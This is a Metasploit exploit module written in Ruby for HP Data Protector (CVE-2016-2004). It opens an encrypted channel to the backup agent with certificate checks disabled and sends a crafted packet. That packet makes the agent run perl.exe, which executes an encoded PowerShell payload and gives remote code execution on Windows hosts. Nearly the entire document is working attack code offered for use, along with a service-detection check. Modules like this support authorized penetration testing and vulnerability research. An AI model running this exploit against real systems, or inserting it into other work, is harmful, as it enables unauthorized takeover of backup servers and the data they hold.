HP Data Protector Encrypted Communication Remote Command Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/exploit/powershell'  
require 'openssl'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Powershell  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",  
'Description' => %q{  
This module exploits a well known remote code execution exploit after establishing encrypted  
control communications with a Data Protector agent. This allows exploitation of Data  
Protector agents that have been configured to only use encrypted control communications.  
  
This exploit works by executing the payload with Microsoft PowerShell so will only work  
against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows  
Server 2008 R2.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Jon Barg', # Reported vuln (originally discovery?) credited by HP  
'Ian Lovering' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2016-2004' ],  
[ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ]  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'WfsDelay' => 30,  
'RPORT' => 5555  
},  
'Privileged' => false,  
'DisclosureDate' => "Apr 18 2016",  
'DefaultTarget' => 0))  
end  
  
def check  
# For the check command  
connect  
sock.put(rand_text_alpha_upper(64))  
response = sock.get_once(-1)  
disconnect  
  
if response.nil?  
return Exploit::CheckCode::Safe  
end  
  
service_version = Rex::Text.to_ascii(response).chop.chomp  
  
if service_version =~ /HP Data Protector/  
vprint_status(service_version)  
return Exploit::CheckCode::Detected  
end  
  
Exploit::CheckCode::Safe  
  
end  
  
def generate_dp_payload  
command = cmd_psh_payload(  
payload.encoded,  
payload_instance.arch.first,  
{ remove_comspec: true, encode_final_payload: true })  
  
payload =  
"\x32\x00\x01\x01\x01\x01\x01\x01" +  
"\x00\x01\x00\x01\x00\x01\x00\x01" +  
"\x01\x00\x20\x32\x38\x00\x5c\x70" +  
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +  
"\x20\x2d\x65\x73\x79\x73\x74\x65" +  
"\x6d('#{command}')\x00"  
  
payload_length = [payload.length].pack('N')  
  
return payload_length + payload  
end  
  
def exploit  
# Main function  
encryption_init_data =  
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +  
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +  
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +  
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +  
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"  
  
print_status("Initiating connection")  
  
# Open connection  
connect  
  
# Send init data  
sock.put(encryption_init_data)  
begin  
buf = sock.get_once  
rescue ::EOFError => e  
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")  
end  
  
print_status("Establishing encrypted channel")  
  
# Create TLS / SSL context  
sock.extend(Rex::Socket::SslTcp)  
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)  
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE  
  
sock.sslctx.options = OpenSSL::SSL::OP_ALL  
  
# Enable all ciphers as older versions of Data Protector only use  
# some not enabled by default  
sock.sslctx.ciphers = "ALL"  
  
# Enable TLS / SSL  
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)  
sock.sslsock.connect  
  
print_status("Sending payload")  
  
# Send payload  
sock.put(generate_dp_payload(), {timeout: 5})  
  
# Close socket  
disconnect  
  
print_status("Waiting for payload execution (this can take up to 30 seconds or so)")  
end  
  
end  
  
`